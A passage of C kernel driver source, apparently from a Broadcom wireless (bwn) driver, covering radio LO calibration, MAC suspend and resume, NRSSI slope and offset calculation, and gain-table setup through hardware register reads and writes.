BWN_PHY_LO_MASK : BWN_PHY_CCK(0x2e); BWN_PHY_WRITE(mac, tmp, 0x007f); tmp = sav->phy_syncctl; BWN_PHY_WRITE(mac, BWN_PHY_SYNCCTL, tmp & 0xff7f); tmp = sav->rf1; BWN_RF_WRITE(mac, 0x007a, tmp & 0xfff0); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2a), 0x8a3); if (phy->type == BWN_PHYTYPE_G || (phy->type == BWN_PHYTYPE_B && phy->rf_ver == 0x2050 && phy->rf_rev >= 6)) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2b), 0x1003); } else BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2b), 0x0802); if (phy->rev >= 2) bwn_dummy_transmission(mac, 0, 1); bwn_phy_g_switch_chan(mac, 6, 0); BWN_RF_READ(mac, 0x51); if (phy->type == BWN_PHYTYPE_G) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2f), 0); nanouptime(&ts); if (time_before(lo->txctl_measured_time, (ts.tv_nsec / 1000000 + ts.tv_sec * 1000) - BWN_LO_TXCTL_EXPIRE)) bwn_lo_measure_txctl_values(mac); if (phy->type == BWN_PHYTYPE_G && phy->rev >= 3) BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0xc078); else { if (phy->type == BWN_PHYTYPE_B) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2e), 0x8078); else BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0x8078); } } static void bwn_lo_restore(struct bwn_mac *mac, struct bwn_lo_g_value *sav) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; uint16_t tmp; if (phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xe300); tmp = (pg->pg_pga_gain << 8); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, tmp | 0xa0); DELAY(5); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, tmp | 0xa2); DELAY(2); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, tmp | 0xa3); } else { tmp = (pg->pg_pga_gain | 0xefa0); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, tmp); } if (phy->type == BWN_PHYTYPE_G) { if (phy->rev >= 3) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2e), 0xc078); else BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2e), 0x8078); if (phy->rev >= 2) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2f), 0x0202); else BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2f), 0x0101); } BWN_WRITE_2(mac, 0x3f4, sav->reg0); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, sav->phy_pgactl); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2a), sav->phy_cck2); BWN_PHY_WRITE(mac, BWN_PHY_SYNCCTL, sav->phy_syncctl); BWN_PHY_WRITE(mac, BWN_PHY_DACCTL, sav->phy_dacctl); BWN_RF_WRITE(mac, 0x43, sav->rf0); BWN_RF_WRITE(mac, 0x7a, sav->rf1); if (!BWN_HAS_TXMAG(phy)) { tmp = sav->rf2; BWN_RF_SETMASK(mac, 0x52, 0xff0f, tmp); } BWN_WRITE_2(mac, 0x3e2, sav->reg1); if (phy->type == BWN_PHYTYPE_B && phy->rf_ver == 0x2050 && phy->rf_rev <= 5) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x30), sav->phy_cck0); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x06), sav->phy_cck1); } if (phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVER, sav->phy_analogover); BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVERVAL, sav->phy_analogoverval); BWN_PHY_WRITE(mac, BWN_PHY_CLASSCTL, sav->phy_classctl); BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, sav->phy_rfover); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, sav->phy_rfoverval); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x3e), sav->phy_cck3); BWN_PHY_WRITE(mac, BWN_PHY_CRS0, sav->phy_crs0); } if (bwn_has_hwpctl(mac)) { tmp = (sav->phy_lomask & 0xbfff); BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, tmp); BWN_PHY_WRITE(mac, BWN_PHY_EXTG(0x01), sav->phy_extg); BWN_PHY_WRITE(mac, BWN_PHY_DACCTL, sav->phy_dacctl_hwpctl); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x14), sav->phy_cck4); BWN_PHY_WRITE(mac, BWN_PHY_HPWR_TSSICTL, sav->phy_hpwr_tssictl); } bwn_phy_g_switch_chan(mac, sav->old_channel, 1); } static int bwn_lo_probe_loctl(struct bwn_mac *mac, struct bwn_loctl *probe, struct bwn_lo_g_sm *d) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_loctl orig, test; struct bwn_loctl prev = { -100, -100 }; static const struct bwn_loctl 
modifiers[] = { { 1, 1,}, { 1, 0,}, { 1, -1,}, { 0, -1,}, { -1, -1,}, { -1, 0,}, { -1, 1,}, { 0, 1,} }; int begin, end, lower = 0, i; uint16_t feedth; if (d->curstate == 0) { begin = 1; end = 8; } else if (d->curstate % 2 == 0) { begin = d->curstate - 1; end = d->curstate + 1; } else { begin = d->curstate - 2; end = d->curstate + 2; } if (begin < 1) begin += 8; if (end > 8) end -= 8; memcpy(&orig, probe, sizeof(struct bwn_loctl)); i = begin; d->curstate = i; while (1) { KASSERT(i >= 1 && i <= 8, ("%s:%d: fail", __func__, __LINE__)); memcpy(&test, &orig, sizeof(struct bwn_loctl)); test.i += modifiers[i - 1].i * d->multipler; test.q += modifiers[i - 1].q * d->multipler; if ((test.i != prev.i || test.q != prev.q) && (abs(test.i) <= 16 && abs(test.q) <= 16)) { bwn_lo_write(mac, &test); feedth = bwn_lo_calcfeed(mac, pg->pg_lna_gain, pg->pg_pga_gain, pg->pg_trsw_rx_gain); if (feedth < d->feedth) { memcpy(probe, &test, sizeof(struct bwn_loctl)); lower = 1; d->feedth = feedth; if (d->nmeasure < 2 && !BWN_HAS_LOOPBACK(phy)) break; } } memcpy(&prev, &test, sizeof(prev)); if (i == end) break; if (i == 8) i = 1; else i++; d->curstate = i; } return (lower); } static void bwn_lo_probe_sm(struct bwn_mac *mac, struct bwn_loctl *loctl, int *rxgain) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_lo_g_sm d; struct bwn_loctl probe; int lower, repeat, cnt = 0; uint16_t feedth; d.nmeasure = 0; d.multipler = 1; if (BWN_HAS_LOOPBACK(phy)) d.multipler = 3; memcpy(&d.loctl, loctl, sizeof(struct bwn_loctl)); repeat = (BWN_HAS_LOOPBACK(phy)) ? 4 : 1; do { bwn_lo_write(mac, &d.loctl); feedth = bwn_lo_calcfeed(mac, pg->pg_lna_gain, pg->pg_pga_gain, pg->pg_trsw_rx_gain); if (feedth < 0x258) { if (feedth >= 0x12c) *rxgain += 6; else *rxgain += 3; feedth = bwn_lo_calcfeed(mac, pg->pg_lna_gain, pg->pg_pga_gain, pg->pg_trsw_rx_gain); } d.feedth = feedth; d.curstate = 0; do { KASSERT(d.curstate >= 0 && d.curstate <= 8, ("%s:%d: fail", __func__, __LINE__)); memcpy(&probe, &d.loctl, sizeof(struct bwn_loctl)); lower = bwn_lo_probe_loctl(mac, &probe, &d); if (!lower) break; if ((probe.i == d.loctl.i) && (probe.q == d.loctl.q)) break; memcpy(&d.loctl, &probe, sizeof(struct bwn_loctl)); d.nmeasure++; } while (d.nmeasure < 24); memcpy(loctl, &d.loctl, sizeof(struct bwn_loctl)); if (BWN_HAS_LOOPBACK(phy)) { if (d.feedth > 0x1194) *rxgain -= 6; else if (d.feedth < 0x5dc) *rxgain += 3; if (cnt == 0) { if (d.feedth <= 0x5dc) { d.multipler = 1; cnt++; } else d.multipler = 2; } else if (cnt == 2) d.multipler = 1; } bwn_lo_measure_gain_values(mac, *rxgain, BWN_HAS_LOOPBACK(phy)); } while (++cnt < repeat); } static struct bwn_lo_calib * bwn_lo_calibset(struct bwn_mac *mac, const struct bwn_bbatt *bbatt, const struct bwn_rfatt *rfatt) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_loctl loctl = { 0, 0 }; struct bwn_lo_calib *cal; struct bwn_lo_g_value sval = { 0 }; int rxgain; uint16_t pad, reg, value; sval.old_channel = phy->chan; bwn_mac_suspend(mac); bwn_lo_save(mac, &sval); reg = bwn_lo_txctl_regtable(mac, &value, &pad); BWN_RF_SETMASK(mac, 0x43, 0xfff0, rfatt->att); BWN_RF_SETMASK(mac, reg, ~value, (rfatt->padmix ? 
value :0)); rxgain = (rfatt->att * 2) + (bbatt->att / 2); if (rfatt->padmix) rxgain -= pad; if (BWN_HAS_LOOPBACK(phy)) rxgain += pg->pg_max_lb_gain; bwn_lo_measure_gain_values(mac, rxgain, BWN_HAS_LOOPBACK(phy)); bwn_phy_g_set_bbatt(mac, bbatt->att); bwn_lo_probe_sm(mac, &loctl, &rxgain); bwn_lo_restore(mac, &sval); bwn_mac_enable(mac); cal = malloc(sizeof(*cal), M_DEVBUF, M_NOWAIT | M_ZERO); if (!cal) { device_printf(mac->mac_sc->sc_dev, "out of memory\n"); return (NULL); } memcpy(&cal->bbatt, bbatt, sizeof(*bbatt)); memcpy(&cal->rfatt, rfatt, sizeof(*rfatt)); memcpy(&cal->ctl, &loctl, sizeof(loctl)); BWN_GETTIME(cal->calib_time); return (cal); } static struct bwn_lo_calib * bwn_lo_get_calib(struct bwn_mac *mac, const struct bwn_bbatt *bbatt, const struct bwn_rfatt *rfatt) { struct bwn_txpwr_loctl *lo = &mac->mac_phy.phy_g.pg_loctl; struct bwn_lo_calib *c; TAILQ_FOREACH(c, &lo->calib_list, list) { if (!BWN_BBATTCMP(&c->bbatt, bbatt)) continue; if (!BWN_RFATTCMP(&c->rfatt, rfatt)) continue; return (c); } c = bwn_lo_calibset(mac, bbatt, rfatt); if (!c) return (NULL); TAILQ_INSERT_TAIL(&lo->calib_list, c, list); return (c); } static void bwn_phy_g_dc_lookup_init(struct bwn_mac *mac, uint8_t update) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; const struct bwn_rfatt *rfatt; const struct bwn_bbatt *bbatt; uint64_t pvector; int i; int rf_offset, bb_offset; uint8_t changed = 0; KASSERT(BWN_DC_LT_SIZE == 32, ("%s:%d: fail", __func__, __LINE__)); KASSERT(lo->rfatt.len * lo->bbatt.len <= 64, ("%s:%d: fail", __func__, __LINE__)); pvector = lo->power_vector; if (!update && !pvector) return; bwn_mac_suspend(mac); for (i = 0; i < BWN_DC_LT_SIZE * 2; i++) { struct bwn_lo_calib *cal; int idx; uint16_t val; if (!update && !(pvector & (((uint64_t)1ULL) << i))) continue; bb_offset = i / lo->rfatt.len; rf_offset = i % lo->rfatt.len; bbatt = &(lo->bbatt.array[bb_offset]); rfatt = &(lo->rfatt.array[rf_offset]); cal = bwn_lo_calibset(mac, bbatt, rfatt); if (!cal) { device_printf(sc->sc_dev, "LO: Could not " "calibrate DC table entry\n"); continue; } val = (uint8_t)(cal->ctl.q); val |= ((uint8_t)(cal->ctl.i)) << 4; free(cal, M_DEVBUF); idx = i / 2; if (i % 2) lo->dc_lt[idx] = (lo->dc_lt[idx] & 0x00ff) | ((val & 0x00ff) << 8); else lo->dc_lt[idx] = (lo->dc_lt[idx] & 0xff00) | (val & 0x00ff); changed = 1; } if (changed) { for (i = 0; i < BWN_DC_LT_SIZE; i++) BWN_PHY_WRITE(mac, 0x3a0 + i, lo->dc_lt[i]); } bwn_mac_enable(mac); } static void bwn_lo_fixup_rfatt(struct bwn_rfatt *rf) { if (!rf->padmix) return; if ((rf->att != 1) && (rf->att != 2) && (rf->att != 3)) rf->att = 4; } static void bwn_lo_g_adjust(struct bwn_mac *mac) { struct bwn_phy_g *pg = &mac->mac_phy.phy_g; struct bwn_lo_calib *cal; struct bwn_rfatt rf; memcpy(&rf, &pg->pg_rfatt, sizeof(rf)); bwn_lo_fixup_rfatt(&rf); cal = bwn_lo_get_calib(mac, &pg->pg_bbatt, &rf); if (!cal) return; bwn_lo_write(mac, &cal->ctl); } static void bwn_lo_g_init(struct bwn_mac *mac) { if (!bwn_has_hwpctl(mac)) return; bwn_lo_get_powervector(mac); bwn_phy_g_dc_lookup_init(mac, 1); } static void bwn_mac_suspend(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; int i; uint32_t tmp; KASSERT(mac->mac_suspended >= 0, ("%s:%d: fail", __func__, __LINE__)); if (mac->mac_suspended == 0) { bwn_psctl(mac, BWN_PS_AWAKE); BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_ON); BWN_READ_4(mac, BWN_MACCTL); for (i = 35; i; i--) { tmp = BWN_READ_4(mac, 
BWN_INTR_REASON); if (tmp & BWN_INTR_MAC_SUSPENDED) goto out; DELAY(10); } for (i = 40; i; i--) { tmp = BWN_READ_4(mac, BWN_INTR_REASON); if (tmp & BWN_INTR_MAC_SUSPENDED) goto out; DELAY(1000); } device_printf(sc->sc_dev, "MAC suspend failed\n"); } out: mac->mac_suspended++; } static void bwn_mac_enable(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint16_t state; state = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODESTAT); if (state != BWN_SHARED_UCODESTAT_SUSPEND && state != BWN_SHARED_UCODESTAT_SLEEP) device_printf(sc->sc_dev, "warn: firmware state (%d)\n", state); mac->mac_suspended--; KASSERT(mac->mac_suspended >= 0, ("%s:%d: fail", __func__, __LINE__)); if (mac->mac_suspended == 0) { BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) | BWN_MACCTL_ON); BWN_WRITE_4(mac, BWN_INTR_REASON, BWN_INTR_MAC_SUSPENDED); BWN_READ_4(mac, BWN_MACCTL); BWN_READ_4(mac, BWN_INTR_REASON); bwn_psctl(mac, 0); } } static void bwn_psctl(struct bwn_mac *mac, uint32_t flags) { struct bwn_softc *sc = mac->mac_sc; int i; uint16_t ucstat; KASSERT(!((flags & BWN_PS_ON) && (flags & BWN_PS_OFF)), ("%s:%d: fail", __func__, __LINE__)); KASSERT(!((flags & BWN_PS_AWAKE) && (flags & BWN_PS_ASLEEP)), ("%s:%d: fail", __func__, __LINE__)); /* XXX forcibly awake and hwps-off */ BWN_WRITE_4(mac, BWN_MACCTL, (BWN_READ_4(mac, BWN_MACCTL) | BWN_MACCTL_AWAKE) & ~BWN_MACCTL_HWPS); BWN_READ_4(mac, BWN_MACCTL); if (siba_get_revid(sc->sc_dev) >= 5) { for (i = 0; i < 100; i++) { ucstat = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODESTAT); if (ucstat != BWN_SHARED_UCODESTAT_SLEEP) break; DELAY(10); } } } static int16_t bwn_nrssi_read(struct bwn_mac *mac, uint16_t offset) { BWN_PHY_WRITE(mac, BWN_PHY_NRSSI_CTRL, offset); return ((int16_t)BWN_PHY_READ(mac, BWN_PHY_NRSSI_DATA)); } static void bwn_nrssi_threshold(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; int32_t a, b; int16_t tmp16; uint16_t tmpu16; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s: fail", __func__)); if (phy->gmode && (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_RSSI)) { if (!pg->pg_aci_wlan_automatic && pg->pg_aci_enable) { a = 0x13; b = 0x12; } else { a = 0xe; b = 0x11; } a = a * (pg->pg_nrssi[1] - pg->pg_nrssi[0]); a += (pg->pg_nrssi[0] << 6); a += (a < 32) ? 31 : 32; a = a >> 6; a = MIN(MAX(a, -31), 31); b = b * (pg->pg_nrssi[1] - pg->pg_nrssi[0]); b += (pg->pg_nrssi[0] << 6); if (b < 32) b += 31; else b += 32; b = b >> 6; b = MIN(MAX(b, -31), 31); tmpu16 = BWN_PHY_READ(mac, 0x048a) & 0xf000; tmpu16 |= ((uint32_t)b & 0x0000003f); tmpu16 |= (((uint32_t)a & 0x0000003f) << 6); BWN_PHY_WRITE(mac, 0x048a, tmpu16); return; } tmp16 = bwn_nrssi_read(mac, 0x20); if (tmp16 >= 0x20) tmp16 -= 0x40; BWN_PHY_SETMASK(mac, 0x048a, 0xf000, (tmp16 < 3) ? 
0x09eb : 0x0aed); } static void bwn_nrssi_slope_11g(struct bwn_mac *mac) { #define SAVE_RF_MAX 3 #define SAVE_PHY_COMM_MAX 4 #define SAVE_PHY3_MAX 8 static const uint16_t save_rf_regs[SAVE_RF_MAX] = { 0x7a, 0x52, 0x43 }; static const uint16_t save_phy_comm_regs[SAVE_PHY_COMM_MAX] = { 0x15, 0x5a, 0x59, 0x58 }; static const uint16_t save_phy3_regs[SAVE_PHY3_MAX] = { 0x002e, 0x002f, 0x080f, BWN_PHY_G_LOCTL, 0x0801, 0x0060, 0x0014, 0x0478 }; struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; int32_t i, tmp32, phy3_idx = 0; uint16_t delta, tmp; uint16_t save_rf[SAVE_RF_MAX]; uint16_t save_phy_comm[SAVE_PHY_COMM_MAX]; uint16_t save_phy3[SAVE_PHY3_MAX]; uint16_t ant_div, phy0, chan_ex; int16_t nrssi0, nrssi1; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s:%d: fail", __func__, __LINE__)); if (phy->rf_rev >= 9) return; if (phy->rf_rev == 8) bwn_nrssi_offset(mac); BWN_PHY_MASK(mac, BWN_PHY_G_CRS, 0x7fff); BWN_PHY_MASK(mac, 0x0802, 0xfffc); /* * Save RF/PHY registers for later restoration */ ant_div = BWN_READ_2(mac, 0x03e2); BWN_WRITE_2(mac, 0x03e2, BWN_READ_2(mac, 0x03e2) | 0x8000); for (i = 0; i < SAVE_RF_MAX; ++i) save_rf[i] = BWN_RF_READ(mac, save_rf_regs[i]); for (i = 0; i < SAVE_PHY_COMM_MAX; ++i) save_phy_comm[i] = BWN_PHY_READ(mac, save_phy_comm_regs[i]); phy0 = BWN_READ_2(mac, BWN_PHY0); chan_ex = BWN_READ_2(mac, BWN_CHANNEL_EXT); if (phy->rev >= 3) { for (i = 0; i < SAVE_PHY3_MAX; ++i) save_phy3[i] = BWN_PHY_READ(mac, save_phy3_regs[i]); BWN_PHY_WRITE(mac, 0x002e, 0); BWN_PHY_WRITE(mac, BWN_PHY_G_LOCTL, 0); switch (phy->rev) { case 4: case 6: case 7: BWN_PHY_SET(mac, 0x0478, 0x0100); BWN_PHY_SET(mac, 0x0801, 0x0040); break; case 3: case 5: BWN_PHY_MASK(mac, 0x0801, 0xffbf); break; } BWN_PHY_SET(mac, 0x0060, 0x0040); BWN_PHY_SET(mac, 0x0014, 0x0200); } /* * Calculate nrssi0 */ BWN_RF_SET(mac, 0x007a, 0x0070); bwn_set_all_gains(mac, 0, 8, 0); BWN_RF_MASK(mac, 0x007a, 0x00f7); if (phy->rev >= 2) { BWN_PHY_SETMASK(mac, 0x0811, 0xffcf, 0x0030); BWN_PHY_SETMASK(mac, 0x0812, 0xffcf, 0x0010); } BWN_RF_SET(mac, 0x007a, 0x0080); DELAY(20); nrssi0 = (int16_t) ((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); if (nrssi0 >= 0x0020) nrssi0 -= 0x0040; /* * Calculate nrssi1 */ BWN_RF_MASK(mac, 0x007a, 0x007f); if (phy->rev >= 2) BWN_PHY_SETMASK(mac, 0x0003, 0xff9f, 0x0040); BWN_WRITE_2(mac, BWN_CHANNEL_EXT, BWN_READ_2(mac, BWN_CHANNEL_EXT) | 0x2000); BWN_RF_SET(mac, 0x007a, 0x000f); BWN_PHY_WRITE(mac, 0x0015, 0xf330); if (phy->rev >= 2) { BWN_PHY_SETMASK(mac, 0x0812, 0xffcf, 0x0020); BWN_PHY_SETMASK(mac, 0x0811, 0xffcf, 0x0020); } bwn_set_all_gains(mac, 3, 0, 1); if (phy->rf_rev == 8) { BWN_RF_WRITE(mac, 0x0043, 0x001f); } else { tmp = BWN_RF_READ(mac, 0x0052) & 0xff0f; BWN_RF_WRITE(mac, 0x0052, tmp | 0x0060); tmp = BWN_RF_READ(mac, 0x0043) & 0xfff0; BWN_RF_WRITE(mac, 0x0043, tmp | 0x0009); } BWN_PHY_WRITE(mac, 0x005a, 0x0480); BWN_PHY_WRITE(mac, 0x0059, 0x0810); BWN_PHY_WRITE(mac, 0x0058, 0x000d); DELAY(20); nrssi1 = (int16_t) ((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); /* * Install calculated narrow RSSI values */ if (nrssi1 >= 0x0020) nrssi1 -= 0x0040; if (nrssi0 == nrssi1) pg->pg_nrssi_slope = 0x00010000; else pg->pg_nrssi_slope = 0x00400000 / (nrssi0 - nrssi1); if (nrssi0 >= -4) { pg->pg_nrssi[0] = nrssi1; pg->pg_nrssi[1] = nrssi0; } /* * Restore saved RF/PHY registers */ if (phy->rev >= 3) { for (phy3_idx = 0; phy3_idx < 4; ++phy3_idx) { BWN_PHY_WRITE(mac, save_phy3_regs[phy3_idx], save_phy3[phy3_idx]); } } if (phy->rev >= 2) { BWN_PHY_MASK(mac, 0x0812, 0xffcf); BWN_PHY_MASK(mac, 0x0811, 
0xffcf); } for (i = 0; i < SAVE_RF_MAX; ++i) BWN_RF_WRITE(mac, save_rf_regs[i], save_rf[i]); BWN_WRITE_2(mac, 0x03e2, ant_div); BWN_WRITE_2(mac, 0x03e6, phy0); BWN_WRITE_2(mac, BWN_CHANNEL_EXT, chan_ex); for (i = 0; i < SAVE_PHY_COMM_MAX; ++i) BWN_PHY_WRITE(mac, save_phy_comm_regs[i], save_phy_comm[i]); bwn_spu_workaround(mac, phy->chan); BWN_PHY_SET(mac, 0x0802, (0x0001 | 0x0002)); bwn_set_original_gains(mac); BWN_PHY_SET(mac, BWN_PHY_G_CRS, 0x8000); if (phy->rev >= 3) { for (; phy3_idx < SAVE_PHY3_MAX; ++phy3_idx) { BWN_PHY_WRITE(mac, save_phy3_regs[phy3_idx], save_phy3[phy3_idx]); } } delta = 0x1f - pg->pg_nrssi[0]; for (i = 0; i < 64; i++) { tmp32 = (((i - delta) * pg->pg_nrssi_slope) / 0x10000) + 0x3a; tmp32 = MIN(MAX(tmp32, 0), 0x3f); pg->pg_nrssi_lt[i] = tmp32; } bwn_nrssi_threshold(mac); #undef SAVE_RF_MAX #undef SAVE_PHY_COMM_MAX #undef SAVE_PHY3_MAX } static void bwn_nrssi_offset(struct bwn_mac *mac) { #define SAVE_RF_MAX 2 #define SAVE_PHY_COMM_MAX 10 #define SAVE_PHY6_MAX 8 static const uint16_t save_rf_regs[SAVE_RF_MAX] = { 0x7a, 0x43 }; static const uint16_t save_phy_comm_regs[SAVE_PHY_COMM_MAX] = { 0x0001, 0x0811, 0x0812, 0x0814, 0x0815, 0x005a, 0x0059, 0x0058, 0x000a, 0x0003 }; static const uint16_t save_phy6_regs[SAVE_PHY6_MAX] = { 0x002e, 0x002f, 0x080f, 0x0810, 0x0801, 0x0060, 0x0014, 0x0478 }; struct bwn_phy *phy = &mac->mac_phy; int i, phy6_idx = 0; uint16_t save_rf[SAVE_RF_MAX]; uint16_t save_phy_comm[SAVE_PHY_COMM_MAX]; uint16_t save_phy6[SAVE_PHY6_MAX]; int16_t nrssi; uint16_t saved = 0xffff; for (i = 0; i < SAVE_PHY_COMM_MAX; ++i) save_phy_comm[i] = BWN_PHY_READ(mac, save_phy_comm_regs[i]); for (i = 0; i < SAVE_RF_MAX; ++i) save_rf[i] = BWN_RF_READ(mac, save_rf_regs[i]); BWN_PHY_MASK(mac, 0x0429, 0x7fff); BWN_PHY_SETMASK(mac, 0x0001, 0x3fff, 0x4000); BWN_PHY_SET(mac, 0x0811, 0x000c); BWN_PHY_SETMASK(mac, 0x0812, 0xfff3, 0x0004); BWN_PHY_MASK(mac, 0x0802, ~(0x1 | 0x2)); if (phy->rev >= 6) { for (i = 0; i < SAVE_PHY6_MAX; ++i) save_phy6[i] = BWN_PHY_READ(mac, save_phy6_regs[i]); BWN_PHY_WRITE(mac, 0x002e, 0); BWN_PHY_WRITE(mac, 0x002f, 0); BWN_PHY_WRITE(mac, 0x080f, 0); BWN_PHY_WRITE(mac, 0x0810, 0); BWN_PHY_SET(mac, 0x0478, 0x0100); BWN_PHY_SET(mac, 0x0801, 0x0040); BWN_PHY_SET(mac, 0x0060, 0x0040); BWN_PHY_SET(mac, 0x0014, 0x0200); } BWN_RF_SET(mac, 0x007a, 0x0070); BWN_RF_SET(mac, 0x007a, 0x0080); DELAY(30); nrssi = (int16_t) ((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); if (nrssi >= 0x20) nrssi -= 0x40; if (nrssi == 31) { for (i = 7; i >= 4; i--) { BWN_RF_WRITE(mac, 0x007b, i); DELAY(20); nrssi = (int16_t) ((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); if (nrssi >= 0x20) nrssi -= 0x40; if (nrssi < 31 && saved == 0xffff) saved = i; } if (saved == 0xffff) saved = 4; } else { BWN_RF_MASK(mac, 0x007a, 0x007f); if (phy->rev != 1) { BWN_PHY_SET(mac, 0x0814, 0x0001); BWN_PHY_MASK(mac, 0x0815, 0xfffe); } BWN_PHY_SET(mac, 0x0811, 0x000c); BWN_PHY_SET(mac, 0x0812, 0x000c); BWN_PHY_SET(mac, 0x0811, 0x0030); BWN_PHY_SET(mac, 0x0812, 0x0030); BWN_PHY_WRITE(mac, 0x005a, 0x0480); BWN_PHY_WRITE(mac, 0x0059, 0x0810); BWN_PHY_WRITE(mac, 0x0058, 0x000d); if (phy->rev == 0) BWN_PHY_WRITE(mac, 0x0003, 0x0122); else BWN_PHY_SET(mac, 0x000a, 0x2000); if (phy->rev != 1) { BWN_PHY_SET(mac, 0x0814, 0x0004); BWN_PHY_MASK(mac, 0x0815, 0xfffb); } BWN_PHY_SETMASK(mac, 0x0003, 0xff9f, 0x0040); BWN_RF_SET(mac, 0x007a, 0x000f); bwn_set_all_gains(mac, 3, 0, 1); BWN_RF_SETMASK(mac, 0x0043, 0x00f0, 0x000f); DELAY(30); nrssi = (int16_t) ((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); if (nrssi >= 0x20) 
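			/*
			 * The value read from PHY register 0x047f is a 6-bit
			 * quantity; subtracting 0x40 sign-extends it.
			 */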
nrssi -= 0x40; if (nrssi == -32) { for (i = 0; i < 4; i++) { BWN_RF_WRITE(mac, 0x007b, i); DELAY(20); nrssi = (int16_t)((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); if (nrssi >= 0x20) nrssi -= 0x40; if (nrssi > -31 && saved == 0xffff) saved = i; } if (saved == 0xffff) saved = 3; } else saved = 0; } BWN_RF_WRITE(mac, 0x007b, saved); /* * Restore saved RF/PHY registers */ if (phy->rev >= 6) { for (phy6_idx = 0; phy6_idx < 4; ++phy6_idx) { BWN_PHY_WRITE(mac, save_phy6_regs[phy6_idx], save_phy6[phy6_idx]); } } if (phy->rev != 1) { for (i = 3; i < 5; i++) BWN_PHY_WRITE(mac, save_phy_comm_regs[i], save_phy_comm[i]); } for (i = 5; i < SAVE_PHY_COMM_MAX; i++) BWN_PHY_WRITE(mac, save_phy_comm_regs[i], save_phy_comm[i]); for (i = SAVE_RF_MAX - 1; i >= 0; --i) BWN_RF_WRITE(mac, save_rf_regs[i], save_rf[i]); BWN_PHY_WRITE(mac, 0x0802, BWN_PHY_READ(mac, 0x0802) | 0x1 | 0x2); BWN_PHY_SET(mac, 0x0429, 0x8000); bwn_set_original_gains(mac); if (phy->rev >= 6) { for (; phy6_idx < SAVE_PHY6_MAX; ++phy6_idx) { BWN_PHY_WRITE(mac, save_phy6_regs[phy6_idx], save_phy6[phy6_idx]); } } BWN_PHY_WRITE(mac, save_phy_comm_regs[0], save_phy_comm[0]); BWN_PHY_WRITE(mac, save_phy_comm_regs[2], save_phy_comm[2]); BWN_PHY_WRITE(mac, save_phy_comm_regs[1], save_phy_comm[1]); } static void bwn_set_all_gains(struct bwn_mac *mac, int16_t first, int16_t second, int16_t third) { struct bwn_phy *phy = &mac->mac_phy; uint16_t i; uint16_t start = 0x08, end = 0x18; uint16_t tmp; uint16_t table; if (phy->rev <= 1) { start = 0x10; end = 0x20; } table = BWN_OFDMTAB_GAINX; if (phy->rev <= 1) table = BWN_OFDMTAB_GAINX_R1; for (i = 0; i < 4; i++) bwn_ofdmtab_write_2(mac, table, i, first); for (i = start; i < end; i++) bwn_ofdmtab_write_2(mac, table, i, second); if (third != -1) { tmp = ((uint16_t) third << 14) | ((uint16_t) third << 6); BWN_PHY_SETMASK(mac, 0x04a0, 0xbfbf, tmp); BWN_PHY_SETMASK(mac, 0x04a1, 0xbfbf, tmp); BWN_PHY_SETMASK(mac, 0x04a2, 0xbfbf, tmp); } bwn_dummy_transmission(mac, 0, 1); } static void bwn_set_original_gains(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; uint16_t i, tmp; uint16_t table; uint16_t start = 0x0008, end = 0x0018; if (phy->rev <= 1) { start = 0x0010; end = 0x0020; } table = BWN_OFDMTAB_GAINX; if (phy->rev <= 1) table = BWN_OFDMTAB_GAINX_R1; for (i = 0; i < 4; 